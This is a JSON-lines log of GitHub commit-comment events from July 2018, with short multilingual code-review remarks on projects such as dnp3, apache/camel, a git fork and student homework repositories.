{"id":"7916328336","type":"CommitCommentEvent","actor":{"login":"Nkromin"},"repo":{"name":"Nkromin/refprog_1"},"payload":{"comment":{"id":29590074,"position":null,"line":null,"path":null,"commit_id":"eb152e5a1c00a3ef5e4a34c3582af90c0e46e626","created_at":"2018-07-04T05:34:50Z","updated_at":"2018-07-04T05:34:50Z","author_association":"OWNER","body":"This Script is responsible for mining Twitter data that have \"@NaMo\" and \"RG\" in their Tweet."}},"created_at":"2018-07-04T05:34:50Z"}
{"id":"7916331249","type":"CommitCommentEvent","actor":{"login":"ljjb"},"repo":{"name":"automatak/dnp3"},"payload":{"comment":{"id":29590078,"position":40,"line":65,"path":"cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h","commit_id":"c21a51b174a297be0d6d2bfb17243df1ed628307","created_at":"2018-07-04T05:36:02Z","updated_at":"2018-07-04T05:36:02Z","author_association":"NONE","body":"Thank you again. I was mistaken, and this code is perfectly valid according to the C++14 Standard. \r\nFrom the [C++14 final draft](https://github.com/cplusplus/draft/blob/master/papers/n4140.pdf) section 8.5 (Initializers), bold mine:\r\n> if T is a **(possibly cv-qualified)** class type (Clause 9) with either no default constructor (12.1) or a default constructor that is user-provided or deleted, then the object is default-initialized;\r\n\r\nand it's specified that the initialization rules hold irrespective of context. I should have done my due diligence and not assumed that my compiler correctly implemented the spec."}},"created_at":"2018-07-04T05:36:02Z"}
{"id":"7916331567","type":"CommitCommentEvent","actor":{"login":"Nkromin"},"repo":{"name":"Nkromin/refprog_1"},"payload":{"comment":{"id":29590081,"position":null,"line":null,"path":null,"commit_id":"a52b82f7643f00bb2bcebd99c89722731ac09213","created_at":"2018-07-04T05:36:09Z","updated_at":"2018-07-04T05:36:09Z","author_association":"OWNER","body":"This Script is responsible for scraping Twitter data, tweeted by \"@namo\"."}},"created_at":"2018-07-04T05:36:09Z"}
{"id":"7916332779","type":"CommitCommentEvent","actor":{"login":"Nkromin"},"repo":{"name":"Nkromin/refprog_1"},"payload":{"comment":{"id":29590083,"position":null,"line":null,"path":null,"commit_id":"2e582aba39630a2cde1aa6450e2d383f31ca59cd","created_at":"2018-07-04T05:36:38Z","updated_at":"2018-07-04T05:36:38Z","author_association":"OWNER","body":"This Script is responsible for scraping Twitter data, tweeted by \"@RG\"."}},"created_at":"2018-07-04T05:36:38Z"}
{"id":"7916332929","type":"CommitCommentEvent","actor":{"login":"stvenyin"},"repo":{"name":"EOSIO/eos"},"payload":{"comment":{"id":29590084,"position":null,"line":null,"path":null,"commit_id":"dc9d41e3bc7027e6ea3c9b00718fe8613054b3fb","created_at":"2018-07-04T05:36:42Z","updated_at":"2018-07-04T05:36:42Z","author_association":"NONE","body":"See."}},"created_at":"2018-07-04T05:36:42Z"}
{"id":"7916342089","type":"CommitCommentEvent","actor":{"login":"lpabon"},"repo":{"name":"libopenstorage/openstorage"},"payload":{"comment":{"id":29590094,"position":66,"line":351,"path":"api/api.proto","commit_id":"87980b9d7d2af65bee8fa9877c6f2cad8af79e96","created_at":"2018-07-04T05:39:39Z","updated_at":"2018-07-04T05:39:39Z","author_association":"MEMBER","body":"This should be oneof if this can be at"}},"created_at":"2018-07-04T05:39:39Z"}
{"id":"7916343770","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29590095,"position":null,"line":null,"path":null,"commit_id":"5dbc14cca38949a761378ec6f592b34b9424af6a","created_at":"2018-07-04T05:40:06Z","updated_at":"2018-07-04T05:40:06Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-04T05:40:06Z"}
{"id":"7916346591","type":"CommitCommentEvent","actor":{"login":"Nkromin"},"repo":{"name":"Nkromin/refprog_1"},"payload":{"comment":{"id":29590098,"position":null,"line":null,"path":null,"commit_id":"9f9f575e220d13800027357e13c93b48aa2074ab","created_at":"2018-07-04T05:40:57Z","updated_at":"2018-07-04T05:40:57Z","author_association":"OWNER","body":"The General Route script from flask. Much work needed"}},"created_at":"2018-07-04T05:40:57Z"}
{"id":"7916349460","type":"CommitCommentEvent","actor":{"login":"brooke01"},"repo":{"name":"brooke01/DotblogsBackup"},"payload":{"comment":{"id":29590109,"position":null,"line":null,"path":null,"commit_id":"0d4067c0fccf877341253465e9b5116e00a6a202","created_at":"2018-07-04T05:41:54Z","updated_at":"2018-07-04T05:41:54Z","author_association":"OWNER","body":"參考資料：\r\nhttps://stackoverflow.com/questions/433171/how-to-embed-a-text-file-in-a-net-assembly\r\nhttps://stackoverflow.com/questions/90697/how-to-create-and-use-resources-in-net"}},"created_at":"2018-07-04T05:41:54Z"}
{"id":"7916350894","type":"CommitCommentEvent","actor":{"login":"FlexiThemes"},"repo":{"name":"FlexiThemes/email-login-auth"},"payload":{"comment":{"id":29590113,"position":null,"line":null,"path":null,"commit_id":"0495f51dfe50e34553286d24e3c133daf133a294","created_at":"2018-07-04T05:42:22Z","updated_at":"2018-07-04T05:42:22Z","author_association":"OWNER","body":"Thank you, @MikkCZ ! Cheers"}},"created_at":"2018-07-04T05:42:22Z"}
{"id":"7916353104","type":"CommitCommentEvent","actor":{"login":"loyd"},"repo":{"name":"theKashey/beautiful-react-redux"},"payload":{"comment":{"id":29590114,"position":10,"line":7,"path":"src/patch.js","commit_id":"c8617322ae2af596147207036c503a50dfbd132b","created_at":"2018-07-04T05:43:07Z","updated_at":"2018-07-04T05:43:07Z","author_association":"NONE","body":"It does not work*.\n\nWhat is the purpose of the first patch?\n\nOn Wed, Jul 4, 2018, 02:17 Anton Korzunov <notifications@github.com> wrote:\n\n> Is it not working, or *breaking* the build?\n> Try to use index, not patch, and then you might *patch* everything by\n> your own.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/theKashey/beautiful-react-redux/commit/c8617322ae2af596147207036c503a50dfbd132b#commitcomment-29588141>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA6HdK-zDXjHweZAWswdvOiXrXz4ndEMks5uC_tygaJpZM4VBUuE>\n> .\n>\n"}},"created_at":"2018-07-04T05:43:07Z"}
{"id":"7916357659","type":"CommitCommentEvent","actor":{"login":"RicterZ"},"repo":{"name":"BGmi/BGmi"},"payload":{"comment":{"id":29590123,"position":16,"line":73,"path":"bgmi/lib/models.py","commit_id":"22d761e237638d116bfd94e70aa9624adebf1528","created_at":"2018-07-04T05:44:41Z","updated_at":"2018-07-04T05:44:41Z","author_association":"MEMBER","body":"你来你来，我peewee没用过"}},"created_at":"2018-07-04T05:44:41Z"}
{"id":"7916361253","type":"CommitCommentEvent","actor":{"login":"donghyunele"},"repo":{"name":"donghyunele/JSP"},"payload":{"comment":{"id":29590132,"position":null,"line":null,"path":null,"commit_id":"40fe5e18f572bc69c6adc93ca029418b4d3fcaef","created_at":"2018-07-04T05:45:46Z","updated_at":"2018-07-04T05:45:46Z","author_association":"OWNER","body":"풀 리퀘스트 후 머지까지 완료했으나 마스터 브랜치에 적용이 안됨.\r\n\r\n가장 마지막 커밋이 계속 마스터에 적용이 안되는 이유를 찾아야함."}},"created_at":"2018-07-04T05:45:46Z"}
{"id":"7916362465","type":"CommitCommentEvent","actor":{"login":"rromanchuk"},"repo":{"name":"Coveralls-Community/coveralls-ruby"},"payload":{"comment":{"id":29590135,"position":null,"line":null,"path":null,"commit_id":"642dbbd24dd791ee50c1e58c016968b476c2119d","created_at":"2018-07-04T05:46:14Z","updated_at":"2018-07-04T05:46:14Z","author_association":"COLLABORATOR","body":"🥇 "}},"created_at":"2018-07-04T05:46:14Z"}
{"id":"7916364875","type":"CommitCommentEvent","actor":{"login":"vindard"},"repo":{"name":"peakshift/telegram-dogecoin"},"payload":{"comment":{"id":29590140,"position":null,"line":null,"path":null,"commit_id":"f0b76a34239eb0ee0aa74aaa7a6514761bebcafd","created_at":"2018-07-04T05:47:08Z","updated_at":"2018-07-04T05:47:08Z","author_association":"COLLABORATOR","body":"Noticed returnBal() had been changed to have  no argument (noticed purely on code reading on Github). I couldn't see any reason why this should be missing so I added it back without doing any retesting on the actual code. \r\n\r\nIf something breaks by chance on review, this would be one place to check."}},"created_at":"2018-07-04T05:47:08Z"}
{"id":"7916366158","type":"CommitCommentEvent","actor":{"login":"PrajapatiChirag"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29590143,"position":null,"line":null,"path":null,"commit_id":"386b571d061a21a2aca8d616e966f7001ae3804c","created_at":"2018-07-04T05:47:36Z","updated_at":"2018-07-04T05:47:36Z","author_association":"NONE","body":"Does it support Chinese character?"}},"created_at":"2018-07-04T05:47:36Z"}
{"id":"7916368546","type":"CommitCommentEvent","actor":{"login":"blueOkiris"},"repo":{"name":"blueOkiris/Super-Chunks"},"payload":{"comment":{"id":29590150,"position":null,"line":null,"path":null,"commit_id":"5f2c4fa06832f360f5b8b7be0d589a36cf4e48de","created_at":"2018-07-04T05:48:27Z","updated_at":"2018-07-04T05:48:27Z","author_association":"OWNER","body":"Meant to say 'Big Update: New \"Level\" object to make transitions easier & Splitup \"Game\" section in update.js'"}},"created_at":"2018-07-04T05:48:27Z"}
{"id":"7916372392","type":"CommitCommentEvent","actor":{"login":"VahidehRt"},"repo":{"name":"VahidehRt/SDE-OIE"},"payload":{"comment":{"id":29590210,"position":null,"line":null,"path":null,"commit_id":"4e7ba41b82f147d3517a373bc3714d33ebb935a8","created_at":"2018-07-04T05:49:56Z","updated_at":"2018-07-04T05:49:56Z","author_association":"OWNER","body":" To configure SDE-OIE, you can use java environment\r\n- run SDE-OIE from there.\r\n+run SDE-OIE from the command line.\r\n "}},"created_at":"2018-07-04T05:49:56Z"}
{"id":"7916380295","type":"CommitCommentEvent","actor":{"login":"akaroml"},"repo":{"name":"jdneo/vscode-azurefunctions"},"payload":{"comment":{"id":29590220,"position":17,"line":43,"path":"src/utils/mavenUtils.ts","commit_id":"b9bb54995efcd5141db6648236dfb194abf65614","created_at":"2018-07-04T05:52:50Z","updated_at":"2018-07-04T05:52:50Z","author_association":"NONE","body":"Can we simply call cpUtils.executeCommand instead?\r\nI understand that we only need a point for telemetry instrumentation."}},"created_at":"2018-07-04T05:52:50Z"}
{"id":"7916387521","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29590227,"position":15,"line":15,"path":"lecture1/src/main/java/otus/springframework/homework/lecture1/services/SurveyServiceImpl.java","commit_id":"7a4ec92d31ac4d8e616e2deb2b34441149b65741","created_at":"2018-07-04T05:55:26Z","updated_at":"2018-07-04T05:55:26Z","author_association":"NONE","body":"Вот лучше, чтобы сервис не хранил внутренее состояние. Здесь можно, а на будщее лучше этого не делать - ибо это нужен как минимум AtomicInt.\r\n\r\nА вот Scanner точно лучше не хранить - кодпрекрасно мжно переписать, например, предавая его в параметры private метода."}},"created_at":"2018-07-04T05:55:26Z"}
{"id":"7916390541","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29590231,"position":21,"line":21,"path":"lecture1/src/main/resources/spring-context.xml","commit_id":"7a4ec92d31ac4d8e616e2deb2b34441149b65741","created_at":"2018-07-04T05:56:30Z","updated_at":"2018-07-04T05:56:30Z","author_association":"NONE","body":"Урррраа!! Не думал, что кто-то это сделает))) Красота, да?) Но данные лучше хранить в CSV))))))))))))"}},"created_at":"2018-07-04T05:56:30Z"}
{"id":"7916392097","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29590235,"position":16,"line":16,"path":"pom.xml","commit_id":"7a4ec92d31ac4d8e616e2deb2b34441149b65741","created_at":"2018-07-04T05:57:04Z","updated_at":"2018-07-04T05:57:04Z","author_association":"NONE","body":"Лучше не использовать mileston-ы. 5.2.0 - прекрасная версия."}},"created_at":"2018-07-04T05:57:04Z"}
{"id":"7916392739","type":"CommitCommentEvent","actor":{"login":"maxkovshoff"},"repo":{"name":"maxkovshoff/One"},"payload":{"comment":{"id":29590238,"position":2,"line":2,"path":"README.md","commit_id":"660c611d2a43be801988fcfc1ad54e03b4f2eed1","created_at":"2018-07-04T05:57:17Z","updated_at":"2018-07-04T05:57:17Z","author_association":"OWNER","body":"Программа носит демонстрационный характер и не требует от Пользователя дополнительных действий."}},"created_at":"2018-07-04T05:57:17Z"}
{"id":"7916393396","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"Algeran/spring-homework"},"payload":{"comment":{"id":29590239,"position":28,"line":28,"path":"pom.xml","commit_id":"7a4ec92d31ac4d8e616e2deb2b34441149b65741","created_at":"2018-07-04T05:57:31Z","updated_at":"2018-07-04T05:57:31Z","author_association":"NONE","body":"Закомментированный код в репозитории не оставляем - для этого и есть гит."}},"created_at":"2018-07-04T05:57:31Z"}
{"id":"7916401303","type":"CommitCommentEvent","actor":{"login":"adrowicaksono"},"repo":{"name":"adrowicaksono/Go-West-App"},"payload":{"comment":{"id":29590259,"position":null,"line":null,"path":null,"commit_id":"a09b264ee85d511e10efc90fdce1347e899bedd4","created_at":"2018-07-04T06:00:15Z","updated_at":"2018-07-04T06:00:15Z","author_association":"OWNER","body":"yeah"}},"created_at":"2018-07-04T06:00:15Z"}
{"id":"7916402928","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29590268,"position":null,"line":null,"path":null,"commit_id":"0af159546a6d580576380167c5ce3fb8ec0b9004","created_at":"2018-07-04T06:00:45Z","updated_at":"2018-07-04T06:00:45Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/multiple-backups-generated-daily/89522/10\n"}},"created_at":"2018-07-04T06:00:45Z"}
{"id":"7916403647","type":"CommitCommentEvent","actor":{"login":"654403812"},"repo":{"name":"654403812/puzzle"},"payload":{"comment":{"id":29590269,"position":null,"line":null,"path":null,"commit_id":"69eb27a414f6831c2b9f7fa56a2d9fc403517ff0","created_at":"2018-07-04T06:00:59Z","updated_at":"2018-07-04T06:00:59Z","author_association":"OWNER","body":"zhifu.plist"}},"created_at":"2018-07-04T06:00:59Z"}
{"id":"7916404202","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29590273,"position":53,"line":1037,"path":"FHEM/41_OREGON.pm","commit_id":"bef1462c2cd2a7d8d2f53a4e9bb839ca586d5950","created_at":"2018-07-04T06:01:09Z","updated_at":"2018-07-04T06:01:09Z","author_association":"CONTRIBUTOR","body":"bei \"batterPercent\" fehlt ein y"}},"created_at":"2018-07-04T06:01:09Z"}
{"id":"7916407000","type":"CommitCommentEvent","actor":{"login":"denio-rus"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29590277,"position":40,"line":66,"path":"lesson4/route.rb","commit_id":"d816465c12ddd4017dbdfd8f2e93f3bde1b258e5","created_at":"2018-07-04T06:02:02Z","updated_at":"2018-07-04T06:02:02Z","author_association":"OWNER","body":"Я думал про последний вариант, не знаю есть ли кольцевые маршруты у поездов, но решил, что это возможно. \r\n"}},"created_at":"2018-07-04T06:02:02Z"}
{"id":"7916407617","type":"CommitCommentEvent","actor":{"login":"42deSix"},"repo":{"name":"heaeat/et-app"},"payload":{"comment":{"id":29590280,"position":60,"line":60,"path":"parsing/test.py","commit_id":"f855124f222c947ddbc9c726fb63ae8ee74ba99f","created_at":"2018-07-04T06:02:14Z","updated_at":"2018-07-04T06:02:14Z","author_association":"NONE","body":"I had a hard time to catch the meaning of avr. Though it seems like in-test now, I think it is better to rename this function later :)"}},"created_at":"2018-07-04T06:02:14Z"}
{"id":"7916410998","type":"CommitCommentEvent","actor":{"login":"GreenArrow2017"},"repo":{"name":"GreenArrow2017/MachineLearning"},"payload":{"comment":{"id":29590285,"position":null,"line":null,"path":null,"commit_id":"149b6eeca531e613def27403afa1f620faa2c5d0","created_at":"2018-07-04T06:03:27Z","updated_at":"2018-07-04T06:03:27Z","author_association":"OWNER","body":"the second version for svm"}},"created_at":"2018-07-04T06:03:27Z"}
{"id":"7916419896","type":"CommitCommentEvent","actor":{"login":"chriscool"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29590298,"position":15,"line":75,"path":"ref-filter.c","commit_id":"2f84f2c663ab1aabe4186ff9d4e9b33b0b8fefce","created_at":"2018-07-04T06:06:27Z","updated_at":"2018-07-04T06:06:27Z","author_association":"NONE","body":"Spurious new line."}},"created_at":"2018-07-04T06:06:27Z"}
{"id":"7916421537","type":"CommitCommentEvent","actor":{"login":"samfoong"},"repo":{"name":"samfoong/teamwork"},"payload":{"comment":{"id":29590301,"position":null,"line":null,"path":null,"commit_id":"91b9077ea4b6f25911b09a0838b9c4b0de1bb7b4","created_at":"2018-07-04T06:07:00Z","updated_at":"2018-07-04T06:07:00Z","author_association":"OWNER","body":"fix issue"}},"created_at":"2018-07-04T06:07:00Z"}
{"id":"7916426033","type":"CommitCommentEvent","actor":{"login":"vitalyster"},"repo":{"name":"fonoster/sipio"},"payload":{"comment":{"id":29590313,"position":null,"line":null,"path":null,"commit_id":"ea16a561181243b9d52eadae54cca829b7e48b0a","created_at":"2018-07-04T06:08:30Z","updated_at":"2018-07-04T06:08:30Z","author_association":"CONTRIBUTOR","body":"Now the gradlew.bat and gradlew shell scripts are missing"}},"created_at":"2018-07-04T06:08:30Z"}
{"id":"7916433174","type":"CommitCommentEvent","actor":{"login":"gaga201702"},"repo":{"name":"luyentap/django-model"},"payload":{"comment":{"id":29590327,"position":null,"line":null,"path":null,"commit_id":"77231edd16571c11ddf5d6bd2a630f9046834036","created_at":"2018-07-04T06:10:51Z","updated_at":"2018-07-04T06:10:51Z","author_association":"CONTRIBUTOR","body":"model action:\r\n-- models\r\n-- admin.py"}},"created_at":"2018-07-04T06:10:51Z"}
{"id":"7916433257","type":"CommitCommentEvent","actor":{"login":"joshua-rodgers"},"repo":{"name":"joshua-rodgers/OCA-Practice"},"payload":{"comment":{"id":29590328,"position":null,"line":null,"path":null,"commit_id":"5b91a8bb5799b516bc4b5ee958769ac508034340","created_at":"2018-07-04T06:10:53Z","updated_at":"2018-07-04T06:10:53Z","author_association":"OWNER","body":"_**The problem is**_ with the `count` variable declared inside the inner nested try-catch block that handles the `RunTimeException` thrown when a Carnivore attempts cannibalism. This variable is intended to be incremented each time a valid meal is tried; if it is equivalent to the total number of items in the list (`animals.size() -1`), that means the entire list has been searched unsuccessfully and that animal starves and is removed from the list. thing is I also used this variable in the `finally` block that was intended to check if the whole list had been searched unsuccessfully and if so end the main loop (as it signifies that there's only one type of animal left), if not proceed with removing the originally selected meal, which is all wrong and the result of a complete brain farc in the form of a complete misunderstanding of how the `finally` statement works. The `finally` runs regardless of what happens with the try-catch, so I'm actually implementing the effect of the cannibalism that I prevented by removing whatever meal was originally selected regardless of whether it was valid or not (even after the checks). This, coupled with the fact that the variable `count` is never reset between meals allows the animals arraylist to _out-shrink_ `count` so at some point when my erroneous `finally` attempts to remove an item at an index that no longer exists, I get an IndexOutOfBoundsException.\r\n\r\n_**The fix is**_ "}},"created_at":"2018-07-04T06:10:53Z"}
{"id":"7916433817","type":"CommitCommentEvent","actor":{"login":"maxkovshoff"},"repo":{"name":"maxkovshoff/One"},"payload":{"comment":{"id":29590331,"position":null,"line":null,"path":null,"commit_id":"660c611d2a43be801988fcfc1ad54e03b4f2eed1","created_at":"2018-07-04T06:11:05Z","updated_at":"2018-07-04T06:11:05Z","author_association":"OWNER","body":"public class FirstCourse {\r\npublic static void main(String[] args) {\r\n\t\r\n     Student student = new Student();\r\n     Group group = new Group();\r\n     Professor proffesor = new Professor();\r\n    }\r\n\t\r\n        class Student { \r\n        public void Student(String name, int age, int average, int count) {\r\n        \r\n            Student1(\"Дима Дмитриев\", 18, 3, 1);\r\n            Student2(\"Толя Анатолиев\", 19, 4, 1);\r\n            Student3(\"Иван Иванов\", 20, 5, 1);\r\n\t        Student4(\"Сергей Сергеев\", 22, 4, 1);\r\n\t        Student5(\"Ирина Ирина\", 21, 3, 1); {\r\n\t\t\t\t \r\n               System.out.println(\"Имя -\" + name + \" Возраст -\" + age + \" Успеваемость -\" + average);\r\n               System.out.println(\"Имя -\" + name + \" Возраст -\" + age + \" Успеваемость -\" + average);\r\n               System.out.println(\"Имя -\" + name + \" Возраст -\" + age + \" Успеваемость -\" + average);\r\n               System.out.println(\"Имя -\" + name + \" Возраст -\" + age + \" Успеваемость -\" + average);\r\n               System.out.println(\"Имя -\" + name + \" Возраст -\" + age + \" Успеваемость -\" + average);\r\n            }\r\n\t    }\r\n\t}\r\n               \r\n        class Group {\r\n        public void choseLeader(String name, int age, int average) {\r\n        \r\n            student1.choseOlder1(\"Дима Дмитриев\", 18, 3);\r\n            student2.choseOlder2(\"Толя Анатолиев\", 19, 4);\r\n            student3.choseOlder3(\"Иван Иванов\", 20, 5);\r\n\t        student4.choseOlder4(\"Сергей Сергеев\", 22, 4);\r\n\t        student5.choseOlder5(\"Ирина Ирина\", 21, 3); {\r\n\t\t\t\t\r\n                if(age > 19) {\r\n\t\t\t\t\t\r\n                  if(average > 4) {\r\n\t\t\t\t\t  \r\n                     System.out.println(name + \" - староста группы\");\r\n                    }\r\n\t\t\t    }\r\n\t        }\r\n        } \t\t\t\r\n               \r\n        class Professor {\r\n        public Professor(String name) {\r\n\t\t\r\n            System.out.println(\"Преподаватель \" + name);\r\n        }\r\n        \r\n        public void counStudent() {\r\n\t\t\r\n                int count = 1; \r\n                     while (count < 5) {\r\n                        System.out.println(\"Присутствуют все\");\r\n                        count++;\r\n                        }\r\n                        if (count < 5) {\r\n                \r\n                     System.out.println(\"Присутствуют не все\");\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n}\r\n"}},"created_at":"2018-07-04T06:11:05Z"}
{"id":"7916436255","type":"CommitCommentEvent","actor":{"login":"Phinome"},"repo":{"name":"ecomfe/fecs"},"payload":{"comment":{"id":29590334,"position":null,"line":null,"path":null,"commit_id":"9e40e996980cc165357fd4ca16c65f7503a24c5d","created_at":"2018-07-04T06:11:54Z","updated_at":"2018-07-04T06:11:54Z","author_association":"CONTRIBUTOR","body":"accept 2 PR; \r\n1. rm invalid rule;\r\n2.update config\r\n3.update manis package"}},"created_at":"2018-07-04T06:11:54Z"}
{"id":"7916437012","type":"CommitCommentEvent","actor":{"login":"chriscool"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29590336,"position":113,"line":874,"path":"ref-filter.c","commit_id":"2f84f2c663ab1aabe4186ff9d4e9b33b0b8fefce","created_at":"2018-07-04T06:12:11Z","updated_at":"2018-07-04T06:12:11Z","author_association":"NONE","body":"Here v->s contains a constant string..."}},"created_at":"2018-07-04T06:12:11Z"}
{"id":"7916437162","type":"CommitCommentEvent","actor":{"login":"luyentap"},"repo":{"name":"luyentap/django-model"},"payload":{"comment":{"id":29590337,"position":null,"line":null,"path":null,"commit_id":"77231edd16571c11ddf5d6bd2a630f9046834036","created_at":"2018-07-04T06:12:13Z","updated_at":"2018-07-04T06:12:13Z","author_association":"OWNER","body":"model action:\r\n-- models\r\n-- admin.py"}},"created_at":"2018-07-04T06:12:13Z"}
{"id":"7916439679","type":"CommitCommentEvent","actor":{"login":"luyentap"},"repo":{"name":"luyentap/django-model"},"payload":{"comment":{"id":29590341,"position":27,"line":31,"path":"practice/admin.py","commit_id":"77231edd16571c11ddf5d6bd2a630f9046834036","created_at":"2018-07-04T06:13:04Z","updated_at":"2018-07-04T06:13:04Z","author_association":"OWNER","body":"register action: delete when all site disable"}},"created_at":"2018-07-04T06:13:04Z"}
{"id":"7916441566","type":"CommitCommentEvent","actor":{"login":"luyentap"},"repo":{"name":"luyentap/django-model"},"payload":{"comment":{"id":29590343,"position":6,"line":10,"path":"practice/admin.py","commit_id":"77231edd16571c11ddf5d6bd2a630f9046834036","created_at":"2018-07-04T06:13:38Z","updated_at":"2018-07-04T06:13:38Z","author_association":"OWNER","body":"disable all site :accept:  delete"}},"created_at":"2018-07-04T06:13:38Z"}
{"id":"7916443395","type":"CommitCommentEvent","actor":{"login":"chriscool"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29590348,"position":118,"line":877,"path":"ref-filter.c","commit_id":"2f84f2c663ab1aabe4186ff9d4e9b33b0b8fefce","created_at":"2018-07-04T06:14:14Z","updated_at":"2018-07-04T06:14:14Z","author_association":"NONE","body":"... but here v->s contains an allocated string.\r\n\r\nSo I wonder if v->s will be freed or not."}},"created_at":"2018-07-04T06:14:14Z"}
{"id":"7916448061","type":"CommitCommentEvent","actor":{"login":"dmvolod"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":29590352,"position":1,"line":241,"path":"camel-core/src/main/java/org/apache/camel/component/file/FileConsumer.java","commit_id":"77b24cde0ee5e6fb53f3510399cbfce3192f4eed","created_at":"2018-07-04T06:15:45Z","updated_at":"2018-07-04T06:15:45Z","author_association":"CONTRIBUTOR","body":"@johnpoth it would be nice to cherry-pick this commit to the camel-2.21.x branch\r\nand please run 'git rebase master' before merge to avoid merge commits\r\nThank you."}},"created_at":"2018-07-04T06:15:45Z"}
{"id":"7916449398","type":"CommitCommentEvent","actor":{"login":"oscerd"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":29590357,"position":1,"line":241,"path":"camel-core/src/main/java/org/apache/camel/component/file/FileConsumer.java","commit_id":"77b24cde0ee5e6fb53f3510399cbfce3192f4eed","created_at":"2018-07-04T06:16:10Z","updated_at":"2018-07-04T06:16:10Z","author_association":"CONTRIBUTOR","body":"I'm already backporting."}},"created_at":"2018-07-04T06:16:10Z"}
{"id":"7916451972","type":"CommitCommentEvent","actor":{"login":"helloqiu"},"repo":{"name":"offu/WeRoBot"},"payload":{"comment":{"id":29590359,"position":4,"line":17,"path":"travis/install.sh","commit_id":"24d18f981207dbd3013afc84fd8b9450874142e6","created_at":"2018-07-04T06:17:00Z","updated_at":"2018-07-04T06:17:00Z","author_association":"COLLABORATOR","body":"@whtsky 其实 `pyenv` 还是会依赖 `openssl`"}},"created_at":"2018-07-04T06:17:00Z"}
{"id":"7916452792","type":"CommitCommentEvent","actor":{"login":"ppazos"},"repo":{"name":"ppazos/cabolabs-ehrserver"},"payload":{"comment":{"id":29590362,"position":null,"line":null,"path":null,"commit_id":"df1ce2278f4afa3ec175e0eaa754e5d696ca801c","created_at":"2018-07-04T06:17:15Z","updated_at":"2018-07-04T06:17:15Z","author_association":"OWNER","body":"this is for #911"}},"created_at":"2018-07-04T06:17:15Z"}
{"id":"7916453330","type":"CommitCommentEvent","actor":{"login":"chriscool"},"repo":{"name":"telezhnaya/git"},"payload":{"comment":{"id":29590363,"position":222,"line":1595,"path":"ref-filter.c","commit_id":"2f84f2c663ab1aabe4186ff9d4e9b33b0b8fefce","created_at":"2018-07-04T06:17:25Z","updated_at":"2018-07-04T06:17:25Z","author_association":"NONE","body":"Here also v->s sometimes point to an allocated string and sometimes to a constant one."}},"created_at":"2018-07-04T06:17:25Z"}
{"id":"7916457194","type":"CommitCommentEvent","actor":{"login":"lakshman119"},"repo":{"name":"lakshman119/https---github.com-forcedotcom-WSDL2Apex"},"payload":{"comment":{"id":29590374,"position":null,"line":null,"path":null,"commit_id":"aa738751f6f47c196656e4bfa12ca4561cb97c81","created_at":"2018-07-04T06:18:40Z","updated_at":"2018-07-04T06:18:40Z","author_association":"OWNER","body":"Deleting"}},"created_at":"2018-07-04T06:18:40Z"}
{"id":"7916458680","type":"CommitCommentEvent","actor":{"login":"lakshman119"},"repo":{"name":"lakshman119/https---github.com-forcedotcom-WSDL2Apex"},"payload":{"comment":{"id":29590380,"position":null,"line":null,"path":null,"commit_id":"aa738751f6f47c196656e4bfa12ca4561cb97c81","created_at":"2018-07-04T06:19:06Z","updated_at":"2018-07-04T06:19:06Z","author_association":"OWNER","body":"Delete it"}},"created_at":"2018-07-04T06:19:06Z"}
{"id":"7916458808","type":"CommitCommentEvent","actor":{"login":"volltin"},"repo":{"name":"volltin/USTC-Software-2018-BE-Test"},"payload":{"comment":{"id":29590381,"position":11,"line":11,"path":"be_test/users/models.py","commit_id":"50a1b75c8b0ecda40fe90dbae7de514e0eea54ec","created_at":"2018-07-04T06:19:09Z","updated_at":"2018-07-04T06:19:09Z","author_association":"OWNER","body":"这里为什么不用 DateTimeField 呢？"}},"created_at":"2018-07-04T06:19:09Z"}
{"id":"7916459164","type":"CommitCommentEvent","actor":{"login":"helloqiu"},"repo":{"name":"offu/WeRoBot"},"payload":{"comment":{"id":29590382,"position":3,"line":3,"path":"travis/script.sh","commit_id":"24d18f981207dbd3013afc84fd8b9450874142e6","created_at":"2018-07-04T06:19:15Z","updated_at":"2018-07-04T06:19:15Z","author_association":"COLLABORATOR","body":"不加 `CFLAGS` 好像就会像测试里那样找不到 `openssl/opensslv.h`"}},"created_at":"2018-07-04T06:19:15Z"}
{"id":"7916460704","type":"CommitCommentEvent","actor":{"login":"GoodwillDarina"},"repo":{"name":"htmlacademy-htmlcss/678015-sedona"},"payload":{"comment":{"id":29590387,"position":37,"line":83,"path":"css/style.css","commit_id":"63073332892ecd28a4271c2bac67327fa9691978","created_at":"2018-07-04T06:19:43Z","updated_at":"2018-07-04T06:19:43Z","author_association":"COLLABORATOR","body":"Зачем тебе здесь margin?"}},"created_at":"2018-07-04T06:19:43Z"}
